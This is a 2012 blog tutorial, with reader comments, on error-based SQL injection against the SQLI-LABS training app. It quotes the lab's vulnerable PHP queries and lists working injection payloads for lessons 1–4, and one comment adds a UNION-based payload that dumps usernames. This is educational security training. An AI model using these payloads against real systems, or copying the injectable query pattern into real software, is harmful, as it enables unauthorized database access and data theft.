Friday, June 22, 2012

SQLI-LABS SERIES PART - 2,3,4,5


CAUTION: This is for educational purposes only, please do not use the skills you gain from following the video lessons, blog to harm or test sites on the internet for whom you do not have permissions. Doing so is illegal. I do not support these sort of activities and would advice you all to stay away from the same... If you do so you are solely responsible for your actions, you have been warned. 



In the first part of the series we downloaded the PHP code files and installed them on the backtrack machine or under XAMPP on windows.
In today's lesson We would start with the Error based SQL injections. 

What exactly is SQL injection?
SQL injection is a technique often used to attack databases through a website. SQL injection is a code injection technique that exploits a security vulnerability in a website's software. -- source wikipedia

How does SQL injection happen?
Let us take the example of Less-1, the webpage is taking an input through the parameter "ID" and passes it on to the backend database by constructing a query in real time.

ERROR BASED SQL INJECTION

Error Based Sql injection is called so because in this errors are being displaded on the web page, and these errors are used to discover the underlying query.


Less-1 
if you open the source of the index.php under Less-1, you would see on line 29
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
in here we see that the variable $id is being wrapped around single quotes.
id = ' $id ' , Now when a  tester provides a  ' or 1=1 then it becomes id = ' ' or 1=1  '  thereby effectively evaluating the complete query as id= empty string  or (evaluate one equals one) and escaping the data boundary and getting executed as code. As there is a quote on right side which we either need to handle or comment out remaining part of query.

  • ' or '1'='1 Will work nicely.   id = ' ' or '1'='1 ' LIMIT 0,1
  • ' or 1=1 --+ Will also work.   id = ' ' or 1=1 --+  ' commented out
  • ' or 1=1 # will also work.       id = ' ' or 1=1 # ' commented out
Less-2 line number 31,32
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  • or 1=1  Will work nicely.   id =   or 1=1  LIMIT 0,1
  • or 1=1 --+ Will also work. id =   or 1=1 --+ 
  • or 1=1 # Will also work.    id =   or 1=1 #

Less-3 line number 31
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
  • ' ) or ('1')=('1 Will work nicely.   id = (' ') or '1'=('1 ') LIMIT 0,1
  • ' ) or 1=1 --+ Will also work.   id = (' ') or 1=1 --+  ') commented out
  • ' ) or 1=1 # will also work.       id = (' ') or 1=1 # ') commented out


Less-4 line number 28,29
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

  • ") or ("1")=("1 Will work nicely.   id = (" ")or ("1")=("1 ") LIMIT 0,1
  • ") or 1=1 --+ Will also work.   id = (" ")or 1=1 --+  ") commented out
  • ") or 1=1 # will also work.       id = (" ") or 1=1 #  ") commented out

hope you all like it.

5 comments:

  1. In lesson 4 you user the the statement:
    hxxp://localhost/sqli-labs/Less-1/?id=99' union%20select 1, group_concat(username),3 from users--+

    Why can we remove the 2 for the second column and not the 3 for the third?

    Then later in the video you show another group_concat() you are able to remove the "3". Why is this?

    ReplyDelete
    Replies
    1. I think you meant video 4. Well if the web application responds to our requests and we some columns interacting with our union statements, then any of that column can be chosen to dump the output. In our example the query is dumping column 2, and 3 on screen therefore any of it can be used to dump info to screen.I just choose 2 randomly.

      Delete
  2. Wow the video being made by you are so simple & understanding that any kid can start exploiting the vulnerability (SQL Injection)...I have been in the Cyber Security Industry for the past 3 yrs and i have never seen such wonderful & most importantly "Understandable" videos..Really Appreciable man...I am afraid what if Crime rate increase these videos man...Keep it safe and be safe...

    ReplyDelete
  3. In video 3 , where you showing less 4
    $id = '"' . $id . '"';

    But In video when you use 1' , it doesn't break why?

    ReplyDelete